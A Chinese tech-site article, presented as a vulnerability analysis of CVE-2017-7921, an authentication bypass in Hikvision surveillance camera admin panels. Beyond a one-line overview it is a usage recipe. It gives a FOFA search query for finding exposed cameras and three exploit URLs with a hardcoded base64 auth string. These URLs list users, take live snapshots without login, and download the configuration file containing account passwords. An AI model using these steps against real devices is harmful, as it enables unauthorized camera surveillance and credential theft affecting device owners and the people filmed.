意见箱
恒创运营部门将仔细参阅您的意见和建议,必要时将通过预留邮箱与您保持联络。感谢您的支持!
意见/建议
提交建议

如何进行CVE-2017-7921的漏洞分析

来源:恒创科技 编辑:恒创科技编辑部
2023-12-02 21:22:59

如何进行CVE-2017-7921的漏洞分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

一、漏洞概述:

杭州海康威视系统技术有限公司摄像头管理后台存在未授权,通过构造url可绕过登录查看监控,检索所有用户和配置文件下载。

fofa网址:fofa.so


如何进行CVE-2017-7921的漏洞分析

fofa搜索:app="HIKVISION-视频监控"

二、漏洞利用:

1、利用路径:

http://your-ip/Security/users?auth=YWRtaW46MTEK

YWRtaW46MTEKadmin:11的base64编码

检索所有用户及其角色的列表。

2、利用路径:

http://your-ip/onvif-http/snapshot?auth=YWRtaW46MTEK

获取监控快照,不进行身份验证。

3、利用路径:

http://your-ip/System/configurationFile?auth=YWRtaW46MTEK

下载摄像头配置账号密码文件。

关于如何进行CVE-2017-7921的漏洞分析问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注恒创行业资讯频道了解更多相关知识。

上一篇: mysql直接拷贝data目录下数据库源文件还原数据库方法 下一篇: HTTPS的加解密原理